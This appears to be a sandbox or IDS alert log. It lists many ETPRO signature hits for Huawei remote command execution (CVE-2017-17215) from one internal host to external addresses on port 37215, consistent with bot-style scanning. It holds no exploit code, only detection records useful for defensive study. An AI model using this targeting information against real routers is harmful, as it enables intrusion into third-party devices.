                                                        06/13/24-21:33:17.306996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5779437215192.168.2.1441.235.201.162
                                                        06/13/24-21:31:59.176037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101437215192.168.2.1441.62.90.19
                                                        06/13/24-21:33:05.012355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022637215192.168.2.14197.165.135.38
                                                        06/13/24-21:32:09.457805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396837215192.168.2.1441.42.242.180
                                                        06/13/24-21:32:21.786043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131837215192.168.2.14156.67.218.203
                                                        06/13/24-21:32:03.307694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4137437215192.168.2.14197.239.228.132
                                                        06/13/24-21:32:15.632368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4591837215192.168.2.14197.21.236.225
                                                        06/13/24-21:33:15.252928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3390437215192.168.2.14197.140.146.160
                                                        06/13/24-21:33:09.131031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4800037215192.168.2.1441.250.185.113
                                                        06/13/24-21:32:54.724818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3559837215192.168.2.14197.247.85.227
                                                        06/13/24-21:33:13.213653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870637215192.168.2.1441.233.61.156
                                                        06/13/24-21:32:15.638708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566237215192.168.2.14156.219.118.25
                                                        06/13/24-21:32:32.168230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5091437215192.168.2.14197.100.99.69
                                                        06/13/24-21:33:09.108149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014037215192.168.2.1441.88.216.104
                                                        06/13/24-21:32:05.346323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786637215192.168.2.14156.106.171.175
                                                        06/13/24-21:32:34.200047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756237215192.168.2.14197.251.96.156
                                                        06/13/24-21:33:02.936360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890437215192.168.2.14197.201.32.24
                                                        06/13/24-21:32:30.075503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946837215192.168.2.14197.199.76.242
                                                        06/13/24-21:32:42.418022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4825637215192.168.2.14197.86.29.231
                                                        06/13/24-21:32:32.152831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435437215192.168.2.1441.128.89.176
                                                        06/13/24-21:32:30.080080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911237215192.168.2.1441.121.231.194
                                                        06/13/24-21:32:54.708645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550237215192.168.2.14156.3.64.42
                                                        06/13/24-21:32:46.502471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481637215192.168.2.14156.217.45.31
                                                        06/13/24-21:32:56.757293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975437215192.168.2.1441.57.217.235
                                                        06/13/24-21:32:23.945660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536237215192.168.2.14197.184.133.8
                                                        06/13/24-21:32:23.941951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754637215192.168.2.14156.26.167.13
                                                        06/13/24-21:31:59.177214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5718837215192.168.2.1441.39.234.106
                                                        06/13/24-21:32:17.672742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3716237215192.168.2.14197.204.182.65
                                                        06/13/24-21:32:13.566878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532037215192.168.2.14197.12.161.14
                                                        06/13/24-21:32:13.566915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5954837215192.168.2.1441.221.131.121
                                                        06/13/24-21:32:56.758326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6055837215192.168.2.14197.225.195.158
                                                        06/13/24-21:32:40.379336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764837215192.168.2.14156.207.216.147
                                                        06/13/24-21:32:15.610874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3702837215192.168.2.14156.106.147.73
                                                        06/13/24-21:33:15.258098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306037215192.168.2.14197.242.15.221
                                                        06/13/24-21:33:15.257930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4516637215192.168.2.14197.135.254.175
                                                        06/13/24-21:33:17.310241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5126037215192.168.2.14197.32.70.135
                                                        06/13/24-21:33:07.055955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5723637215192.168.2.14156.169.128.73
                                                        06/13/24-21:31:59.176868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6012237215192.168.2.1441.98.185.208
                                                        06/13/24-21:32:36.242228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4058637215192.168.2.14197.162.147.25
                                                        06/13/24-21:33:00.866574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476237215192.168.2.1441.17.155.46
                                                        06/13/24-21:32:25.972454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3461837215192.168.2.14197.254.195.208
                                                        06/13/24-21:33:02.913377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819437215192.168.2.14156.146.156.173
                                                        06/13/24-21:31:57.094109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738237215192.168.2.1441.165.241.236
                                                        06/13/24-21:32:03.306958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878037215192.168.2.14156.9.135.180
                                                        06/13/24-21:33:13.227828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4356037215192.168.2.14156.117.253.101
                                                        06/13/24-21:31:59.177028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815637215192.168.2.14156.52.58.71
                                                        06/13/24-21:32:30.095814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5478437215192.168.2.14156.37.245.0
                                                        06/13/24-21:32:42.408100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013037215192.168.2.1441.49.162.63
                                                        06/13/24-21:33:07.058557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3945437215192.168.2.14197.7.248.51
                                                        06/13/24-21:33:15.255554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5128437215192.168.2.14156.230.214.231
                                                        06/13/24-21:32:19.752309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344437215192.168.2.14156.197.247.131
                                                        06/13/24-21:32:09.438567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3456237215192.168.2.14197.229.237.19
                                                        06/13/24-21:32:28.043975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5046637215192.168.2.14156.58.34.91
                                                        06/13/24-21:33:00.886500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261837215192.168.2.14197.169.194.72
                                                        06/13/24-21:33:02.952189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5052637215192.168.2.1441.205.204.249
                                                        06/13/24-21:33:09.129170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481837215192.168.2.14197.77.104.116
                                                        06/13/24-21:31:57.135920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098237215192.168.2.1441.115.248.106
                                                        06/13/24-21:32:38.322708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191837215192.168.2.14197.98.191.199
                                                        06/13/24-21:32:56.785764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975037215192.168.2.14156.159.108.105
                                                        06/13/24-21:32:38.317842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4307037215192.168.2.14197.121.9.48
                                                        06/13/24-21:33:13.211026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233637215192.168.2.1441.141.94.163
                                                        06/13/24-21:32:30.097377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447037215192.168.2.14156.101.246.18
                                                        06/13/24-21:32:48.571798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665637215192.168.2.14197.181.232.10
                                                        06/13/24-21:33:17.309889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238037215192.168.2.14197.118.225.57
                                                        06/13/24-21:33:09.088948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4829037215192.168.2.1441.150.31.85
                                                        06/13/24-21:32:07.417372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5993437215192.168.2.1441.191.29.205
                                                        06/13/24-21:32:07.415868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3487037215192.168.2.14156.231.241.129
                                                        06/13/24-21:32:52.677745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580037215192.168.2.14156.46.227.131
                                                        06/13/24-21:33:04.993578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4100837215192.168.2.1441.7.91.132
                                                        06/13/24-21:32:03.304098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5377837215192.168.2.1441.194.81.49
                                                        06/13/24-21:32:25.992283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4810837215192.168.2.14197.21.219.241
                                                        06/13/24-21:32:56.757993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5826037215192.168.2.14197.233.173.76
                                                        06/13/24-21:33:13.212660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913237215192.168.2.1441.244.186.69
                                                        06/13/24-21:32:01.237538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5005637215192.168.2.14197.14.145.195
                                                        06/13/24-21:32:48.573280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596237215192.168.2.1441.235.27.112
                                                        06/13/24-21:32:38.300249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990237215192.168.2.14197.129.152.185
                                                        06/13/24-21:32:23.832552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5088637215192.168.2.14197.60.252.147
                                                        06/13/24-21:32:30.075848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425437215192.168.2.1441.50.17.82
                                                        06/13/24-21:32:07.403773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3857637215192.168.2.1441.33.100.152
                                                        06/13/24-21:32:05.349711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5715037215192.168.2.14156.203.73.102
                                                        06/13/24-21:32:32.169807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090837215192.168.2.14156.38.76.247
                                                        06/13/24-21:32:03.279910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4408037215192.168.2.1441.76.31.108
                                                        06/13/24-21:33:09.086875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845437215192.168.2.14197.199.1.56
                                                        06/13/24-21:32:03.276461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034437215192.168.2.1441.31.232.127
                                                        06/13/24-21:32:07.402348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4817437215192.168.2.1441.18.144.233
                                                        06/13/24-21:32:03.276140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759637215192.168.2.1441.28.77.14
                                                        06/13/24-21:32:07.402510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660437215192.168.2.1441.169.160.177
                                                        06/13/24-21:32:25.991902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3795837215192.168.2.1441.76.155.20
                                                        06/13/24-21:32:46.526652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6002037215192.168.2.14197.151.33.203
                                                        06/13/24-21:32:13.569599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4622437215192.168.2.1441.197.233.38
                                                        06/13/24-21:32:42.403560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4606637215192.168.2.14197.127.112.147
                                                        06/13/24-21:32:25.996831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5567837215192.168.2.1441.217.109.35
                                                        06/13/24-21:32:46.525502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5088837215192.168.2.1441.78.233.45
                                                        06/13/24-21:32:09.456310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216637215192.168.2.1441.17.135.84
                                                        06/13/24-21:31:59.177398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5714437215192.168.2.1441.210.189.234
                                                        06/13/24-21:31:59.197330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6036637215192.168.2.14156.58.220.239
                                                        06/13/24-21:32:09.458315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763837215192.168.2.14156.64.80.53
                                                        06/13/24-21:32:25.972328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389437215192.168.2.1441.168.19.166
                                                        06/13/24-21:32:34.191764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4200837215192.168.2.14156.247.185.242
                                                        06/13/24-21:32:25.974060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4328837215192.168.2.14156.250.27.214
                                                        06/13/24-21:33:00.889154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5046237215192.168.2.14197.114.110.11
                                                        06/13/24-21:32:25.972151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536837215192.168.2.14197.129.147.175
                                                        06/13/24-21:33:15.254377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298437215192.168.2.14156.57.216.252
                                                        06/13/24-21:33:09.086088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923037215192.168.2.14197.92.113.75
                                                        06/13/24-21:32:25.997066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6032637215192.168.2.14156.211.111.85
                                                        06/13/24-21:32:32.165626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625437215192.168.2.1441.171.3.93
                                                        06/13/24-21:32:56.757002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919837215192.168.2.1441.211.235.94
                                                        06/13/24-21:32:01.220388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156837215192.168.2.14197.20.19.32
                                                        06/13/24-21:32:01.221728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986637215192.168.2.14156.202.232.222
                                                        06/13/24-21:32:15.607185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721837215192.168.2.14197.89.109.212
                                                        06/13/24-21:31:59.174438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709237215192.168.2.14197.59.241.93
                                                        06/13/24-21:33:00.888232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305237215192.168.2.1441.23.16.218
                                                        06/13/24-21:32:15.633505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4477437215192.168.2.14156.222.57.234
                                                        06/13/24-21:32:32.165990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192237215192.168.2.14156.188.96.222
                                                        06/13/24-21:32:15.604605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4558837215192.168.2.1441.53.214.109
                                                        06/13/24-21:33:00.886773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4868437215192.168.2.14197.180.205.157
                                                        06/13/24-21:32:54.726881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5173237215192.168.2.14156.201.20.168
                                                        06/13/24-21:32:03.276684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5561837215192.168.2.14197.212.192.227
                                                        06/13/24-21:32:56.783269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5286637215192.168.2.1441.87.187.242
                                                        06/13/24-21:32:58.841622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5367237215192.168.2.14197.135.179.49
                                                        06/13/24-21:32:05.348501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4802637215192.168.2.14156.146.251.137
                                                        06/13/24-21:32:48.572000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928837215192.168.2.14156.16.231.157
                                                        06/13/24-21:32:11.487444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4981237215192.168.2.14197.111.168.142
                                                        06/13/24-21:32:40.355657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200437215192.168.2.14197.232.154.152
                                                        06/13/24-21:32:11.487561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4816237215192.168.2.1441.201.222.228
                                                        06/13/24-21:32:03.279195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140637215192.168.2.14197.100.45.9
                                                        06/13/24-21:33:02.913772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077837215192.168.2.1441.48.52.6
                                                        06/13/24-21:32:11.506697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4219837215192.168.2.1441.44.73.217
                                                        06/13/24-21:32:21.782752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649837215192.168.2.14156.88.129.12
                                                        06/13/24-21:33:09.111933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304037215192.168.2.14156.81.34.25
                                                        06/13/24-21:32:32.154332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4014637215192.168.2.1441.30.159.244
                                                        06/13/24-21:32:38.320575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412637215192.168.2.14197.72.226.166
                                                        06/13/24-21:33:13.212300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4453037215192.168.2.14156.125.12.46
                                                        06/13/24-21:32:01.246734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511837215192.168.2.1441.116.95.160
                                                        06/13/24-21:32:23.834492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064237215192.168.2.14197.103.91.172
                                                        06/13/24-21:31:59.196012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3611837215192.168.2.14197.212.142.4
                                                        06/13/24-21:33:00.889019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484837215192.168.2.14197.254.39.40
                                                        06/13/24-21:32:09.456745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4529637215192.168.2.14197.212.86.204
                                                        06/13/24-21:32:36.246254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534237215192.168.2.1441.69.214.31
                                                        06/13/24-21:32:42.405048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3656837215192.168.2.1441.54.178.100
                                                        06/13/24-21:32:13.544921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4345437215192.168.2.14197.2.71.113
                                                        06/13/24-21:31:57.093478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042037215192.168.2.1441.29.33.191
                                                        06/13/24-21:32:13.543442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4700437215192.168.2.14156.135.41.46
                                                        06/13/24-21:32:13.568100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076037215192.168.2.14197.66.127.9
                                                        06/13/24-21:32:19.728389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569237215192.168.2.14156.155.44.26
                                                        06/13/24-21:33:11.174664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4421237215192.168.2.14156.229.105.34
                                                        06/13/24-21:32:13.569406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917237215192.168.2.1441.201.181.199
                                                        06/13/24-21:32:42.403226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3299037215192.168.2.14197.134.252.43
                                                        06/13/24-21:32:58.822267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4645437215192.168.2.1441.21.68.223
                                                        06/13/24-21:33:11.176589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4461037215192.168.2.1441.168.69.31
                                                        06/13/24-21:32:17.696498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5228237215192.168.2.14197.143.102.156
                                                        06/13/24-21:33:13.211519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184037215192.168.2.14156.172.45.16
                                                        06/13/24-21:33:09.108860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4542637215192.168.2.1441.231.230.119
                                                        06/13/24-21:32:40.372349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838637215192.168.2.14156.247.82.136
                                                        06/13/24-21:32:54.724952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442637215192.168.2.14197.95.61.6
                                                        06/13/24-21:33:13.212494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041637215192.168.2.14156.92.37.142
                                                        06/13/24-21:32:30.073932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4274637215192.168.2.14197.60.255.207
                                                        06/13/24-21:32:58.842095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620437215192.168.2.1441.121.59.225
                                                        06/13/24-21:33:17.306558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4276437215192.168.2.14156.50.212.61
                                                        06/13/24-21:32:42.407702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5651037215192.168.2.1441.101.21.8
                                                        06/13/24-21:32:58.820328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133437215192.168.2.14156.105.0.95
                                                        06/13/24-21:32:17.672004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4869037215192.168.2.14156.25.83.247
                                                        06/13/24-21:33:13.213098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5330837215192.168.2.14156.121.193.226
                                                        06/13/24-21:33:04.992823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3730637215192.168.2.14156.52.21.151
                                                        06/13/24-21:32:11.485707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652437215192.168.2.14197.153.125.69
                                                        06/13/24-21:32:38.302009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181437215192.168.2.1441.98.24.247
                                                        06/13/24-21:32:17.678296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3912237215192.168.2.1441.237.147.178
                                                        06/13/24-21:32:36.243548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4042037215192.168.2.14156.197.80.119
                                                        06/13/24-21:32:23.932798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291037215192.168.2.1441.62.76.150
                                                        06/13/24-21:32:46.523943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349437215192.168.2.1441.194.149.210
                                                        06/13/24-21:32:50.631701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573837215192.168.2.14156.203.21.211
                                                        06/13/24-21:32:44.477331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331237215192.168.2.14197.108.235.230
                                                        06/13/24-21:33:09.109748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3441837215192.168.2.14197.111.142.188
                                                        06/13/24-21:33:09.087130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4206037215192.168.2.1441.142.180.214
                                                        06/13/24-21:32:56.755515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061437215192.168.2.14197.90.176.238
                                                        06/13/24-21:32:28.042671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413237215192.168.2.14156.196.170.195
                                                        06/13/24-21:33:09.128340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276437215192.168.2.14197.237.222.71
                                                        06/13/24-21:32:56.753493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566637215192.168.2.14197.192.186.147
                                                        06/13/24-21:33:13.212372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629637215192.168.2.14156.236.0.252
                                                        06/13/24-21:32:01.242012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5896237215192.168.2.14197.49.121.243
                                                        06/13/24-21:32:15.635987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297437215192.168.2.1441.37.67.199
                                                        06/13/24-21:31:57.153921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574437215192.168.2.14156.142.178.67
                                                        06/13/24-21:33:00.871241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026437215192.168.2.14156.182.204.98
                                                        06/13/24-21:32:44.455288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3667837215192.168.2.14197.162.45.66
                                                        06/13/24-21:32:46.508130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525237215192.168.2.1441.214.171.2
                                                        06/13/24-21:32:52.656947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4930037215192.168.2.14156.204.41.58
